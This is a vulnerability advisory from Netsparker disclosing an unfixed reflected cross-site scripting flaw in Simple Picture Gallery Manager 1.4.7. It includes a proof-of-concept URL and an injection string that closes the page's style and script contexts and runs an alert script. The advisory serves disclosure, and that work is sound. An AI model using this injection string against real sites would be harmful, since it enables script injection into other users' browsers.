Information
--------------------
Advisory by Netsparker
Name: Reflected XSS Vulnerability in Simple Picture Gallery Manager
Affected Software : Simple Picture Gallery Manager 1.4.7
Affected Versions: 1.4.7
Vendor Homepage : https://sourceforge.net/projects/spgm/ 
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Not Fixed
Netsparker Advisory Reference : NS-17-013

Technical Details
--------------------

Proof of Concept URL for XSS vulnerability in Simple Picture Gallery Manager 1.4.7;

URL /spgm-1.4.7/?'"--></style></scRipt><scRipt>alert(0x000068)</scRipt>
Parameter Name Query Based
Parameter Type Query String
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000068)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
07 March 2017 - Advisory released

Solution
--------------------
-

Credits & Authors
--------------------
This issues has been discovered by Enes Aslanbakan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

; ;